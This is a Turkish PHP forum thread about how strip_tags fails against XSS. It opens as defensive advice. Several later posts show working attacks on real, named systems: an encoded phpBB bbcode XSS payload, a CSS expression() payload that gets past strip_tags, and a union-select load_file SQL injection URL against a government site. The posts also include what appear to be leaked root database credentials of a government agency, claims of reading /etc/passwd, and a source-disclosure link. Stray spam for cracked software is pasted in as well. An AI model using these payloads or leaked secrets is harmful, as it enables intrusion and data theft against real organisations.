Güvenlik Kütüphanesi

İnsan yapımı fonksiyonlar çoğunda bug dolu .piyasada makale çok'ta ayrıntı yok

Bazen mesajlarda bbcode benzer kodlar kullanmak isteriz ama htmlspecialchars'tan geçirip sonrada str_replace yapmak yerine strip_tags() 'ta kullanılabilir örneğin:

$text = "<a href='#'>Lisans</a><b>Lisans</b><script>alert('Lisans');</script>";
echo strip_tags($text,'<a><b>');

Bunun sonucunda <a> ve <b> tag'ları çalışır fakat <script> tag'ı silinir.Böylece kötü komutlardan bir nevi kurtulmuş olursunuz.

strip_tags Güvenmeyin bence

<div onclick="alert('Kral_Benim');">

niye strip_tags kullanıp çirkin ve güvensiz 1 data oluşturalım regular expression ı iyi biliyorsan ve aldığın variable ları html taglarının dışına taşirmiyacak şekilde filtrelersen ne güzel eski 1 phpbb bug u gösteriim

%5Burl%5Dwww.%5Burl%3Dwww.s%3D%27%27style%3D%27top%3Aexpression%28eval%28this.sss%29%29%3B%27sss%3D%60alert%28%27lol%27%29%3Bthis.sss%3Dnull%60s%3D%27%5D%5B/url%5D%5B/url%5D%27

kodu javascript:unescape(""); yaparak direk browserda decode edin çünkü forum otomatik işlior tagları

şu an vb nin son sürümlerinde 1 bbcode da xss wardı galiba bakmiorum uzun zamandır
bi de yahoo mail de war o da bbcode ta wbb de de bulmuştuk falan filan bıraktık artık

Bu bug yanlış preg_match kullanımından kaynaklanan bir hata sanırım. regex ile yapılır tabiki ancak profesyonel derecede bilmen gerekli yoksa istenmeyen sonuçlar doğar.Amatör'lere yönelik anlatıyorum bu yüzden bahsetmedim henüz

tontonq sürekli bunu yapıyorsun birşeyler diyorsun ama tamamı yok ya deme yada budur çözümüde budur de yaptığın iş değnek altından sopa göstermek oluyor adamları huzursuz ediyorsun o zaman anlat mesala gelen veriyi urldecode yapıp sonra strip_tags tan geçirin de 1 de urldecode den önce strtolower da kopanabilir yani
strip_tags(strtolower(urldecode($r10)),'<a><b>');
gibi birşeyler...
ama çıkar birisi der hackerim böyle bir açık var der php bilmez tamam böyle kapanır bu vs. de denebilir yoruma açık varsa bildiğiniz açıklar php bilginizde varsa ki var diye biliyorum açığıda kapamasınıda yazıverirsiniz : ) hoş olur zannımca

çalişiyorum napiyim şu yazıları yazarken bile ne kadar zaman kaybettiğimi bu kaybettiğim zaman içinde işimle ilgili ne yapmam gerektiğini hatırlıyorum
her dediğim şeye ayrıntılı değinecem diye bişi yok gidin araştırın
<?
$r10 = "<a href='#'>Lisans</a><b>Lisans</b><a rel=nofollow target=_blank href='http://x.org' style='top:expression(eval(this.sss));'sss=`alert( 'lol');this.sss=null`>xxxx</a>x";
echo strip_tags(strtolower(urldecode($r10)),'<a><b>');
?>
buyrun
http://img258.imageshack.us/img258/5...tagsxsssh0.jpg
ayrıca url_decode tan kastım o değildi örneğin $a = urldecode(htmlspecialchars(()); yaparsanız double encode edip aşılabililebilir demek istemiştim

neden her gittiğim forumda küfürsüz spamsız mesajlarıma rağmen insanlar benle tartışır anlamam vallahi bu topic e mesaj yazmamın tek amacı php deki bilinen ve özellikle pek bilinmeyen ve doğabilecek tehlikleri tartışamaktı
1 kaç değişik örnek veriymi madem : )
T.C. Başbakanlık GAP Bölge Kalkınma İdaresi Başkanlığı
array( "Type" => "MySQL", "DBLib" => "MySQL", "Database" => "yeni_gap", "Host" => "localhost", "Port" => "3306", "User" => "root", "Password" => "190634?!ta1972", "Persistent" => false, "DateFormat" => array("mm", "/", "dd", "/", "yyyy", " ", "HH", ":", "nn", ":", "ss"), "BooleanFormat" => array("true", "false", ""), "Uppercase" => false ) );
http://www.tug.tubitak.gov.tr/haber.php?id=-1+union+select+0,1,load_file("/var/www/html/index. php"),3,4,5/*
Windows Vista Ultimate Edition x64 Activated Rereleased full version download listing. Fullreleases.com - your #1 source of *****, ddls, cracks, serials, and torrents
sql sorgusu files= in sonunda base64 lü şekilde duruyor bundada load_file yapıpı /etc/passwd ü okdum

http://www.onlinevideolar.com/templates/index.tpl

remote source disclosure

script bildiğimiz ostube scripti tema bilmediğimiz güzel tema

apple.com dakini göstermiycem the_bekir kızar
(link ler eğitim amaçlıdır kesinlikle sorumluluk üstlenmiyorum)
ben susuyorum siz devam edin